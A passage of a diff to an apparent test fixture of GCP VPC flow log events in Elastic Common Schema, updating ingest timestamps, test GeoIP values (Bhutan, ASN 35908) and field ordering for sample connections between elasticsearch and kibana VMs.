@@ -19087,7 +19996,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392238Z", + "ingested": "2021-12-14T14:43:27.415273820Z", "original": "{\"insertId\":\"19im82tfdygzo4\",\"jsonPayload\":{\"bytes_sent\":\"143085\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074688714Z", @@ -19109,11 +20018,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33510, 
@@ -19185,7 +20099,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392243800Z", + "ingested": "2021-12-14T14:43:27.415274217Z", "original": "{\"insertId\":\"19im82tfdygznt\",\"jsonPayload\":{\"bytes_sent\":\"61245\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074688714Z", @@ -19207,11 +20121,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33532, 
@@ -19283,7 +20202,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392247100Z", + "ingested": "2021-12-14T14:43:27.415274659Z", "original": "{\"insertId\":\"19im82tfdygznu\",\"jsonPayload\":{\"bytes_sent\":\"65919\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072555233Z", 
@@ -19294,43 +20213,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" - }, - "as": { - "number": 4837 - }, - "address": "67.43.156.14", - "port": 41822, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.139.99.242", - "port": 22, - "bytes": 0, - "packets": 4, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", - "bytes": 0, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 4, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -19341,6 +20223,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -19361,8 +20246,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 41822, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.139.99.242", + "port": 22, + "bytes": 0, + "packets": 4, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.392251600Z", + "ingested": "2021-12-14T14:43:27.415275149Z", "original": "{\"insertId\":\"19im82tfdygzo6\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":41822,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:40.058368408Z\",\"packets_sent\":\"4\",\"reporter\":\"SRC\",\"rtt_msec\":\"1439\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:12.068494835Z", 
@@ -19370,6 +20280,18 @@ "id": "19im82tfdygzo6", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", + "bytes": 0, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 4, + "direction": "outbound" } }, { @@ -19378,11 +20300,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33532, 
@@ -19460,7 +20387,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392257300Z", + "ingested": "2021-12-14T14:43:27.415275634Z", "original": "{\"insertId\":\"19im82tfdygzno\",\"jsonPayload\":{\"bytes_sent\":\"188997\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"251\",\"reporter\":\"SRC\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072555233Z", @@ -19476,11 +20403,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33568, 
@@ -19558,7 +20490,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392262900Z", + "ingested": "2021-12-14T14:43:27.415276075Z", "original": "{\"insertId\":\"19im82tfdygzo0\",\"jsonPayload\":{\"bytes_sent\":\"16783\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"79\",\"reporter\":\"SRC\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.456732113Z", @@ -19574,11 +20506,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -19656,7 +20593,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392266800Z", + "ingested": "2021-12-14T14:43:27.415276467Z", "original": "{\"insertId\":\"19im82tfdygznd\",\"jsonPayload\":{\"bytes_sent\":\"18120\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458361534Z", @@ -19672,11 +20609,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -19754,7 +20696,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392271300Z", + "ingested": "2021-12-14T14:43:27.415276867Z", "original": "{\"insertId\":\"19im82tfdygzn8\",\"jsonPayload\":{\"bytes_sent\":\"64071\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"368\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140109489Z", @@ -19770,11 +20712,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 53106, 
@@ -19852,7 +20799,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392276900Z", + "ingested": "2021-12-14T14:43:27.415277261Z", "original": "{\"insertId\":\"19im82tfdygznw\",\"jsonPayload\":{\"bytes_sent\":\"175465\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53106,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"337\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.020290305Z", 
@@ -19863,43 +20810,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Boardman", - "region_name": "Oregon" - }, - "as": { - "number": 16509 - }, - "address": "67.43.156.13", - "port": 9243, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.49.136.133", - "port": 52780, - "bytes": 1987804, - "packets": 26428, - "domain": "simianhacker-demo", - "ip": "10.49.136.133" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:iY4jL+9QMjdSzot4PM7XduwgWhY=", - "bytes": 1987804, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 26428, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -19910,6 +20820,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -19930,8 +20843,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 9243, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.49.136.133", + "port": 52780, + "bytes": 1987804, + "packets": 26428, + "domain": "simianhacker-demo", + "ip": "10.49.136.133" + }, "event": { - "ingested": "2021-12-09T13:37:46.392280900Z", + "ingested": "2021-12-14T14:43:27.415277781Z", "original": "{\"insertId\":\"19im82tfdygzo2\",\"jsonPayload\":{\"bytes_sent\":\"1987804\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":52780},\"dest_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"26428\",\"reporter\":\"SRC\",\"rtt_msec\":\"91\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.183499423Z", 
@@ -19939,6 +20877,18 @@ "id": "19im82tfdygzo2", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:iY4jL+9QMjdSzot4PM7XduwgWhY=", + "bytes": 1987804, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 26428, + "direction": "outbound" } }, { @@ -19953,11 +20903,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -20029,7 +20984,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392285Z", + "ingested": "2021-12-14T14:43:27.415278175Z", "original": "{\"insertId\":\"19im82tfdygzn9\",\"jsonPayload\":{\"bytes_sent\":\"206824\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072372604Z", @@ -20051,11 +21006,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -20127,7 +21087,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392288400Z", + "ingested": "2021-12-14T14:43:27.415278562Z", "original": "{\"insertId\":\"19im82tfdygznh\",\"jsonPayload\":{\"bytes_sent\":\"14287\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458361534Z", @@ -20149,11 +21109,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33550, 
@@ -20225,7 +21190,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392292700Z", + "ingested": "2021-12-14T14:43:27.415278955Z", "original": "{\"insertId\":\"19im82tfdygzny\",\"jsonPayload\":{\"bytes_sent\":\"59376\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.496238286Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.496238286Z", @@ -20247,11 +21212,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33568, 
@@ -20323,7 +21293,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392298500Z", + "ingested": "2021-12-14T14:43:27.415279401Z", "original": 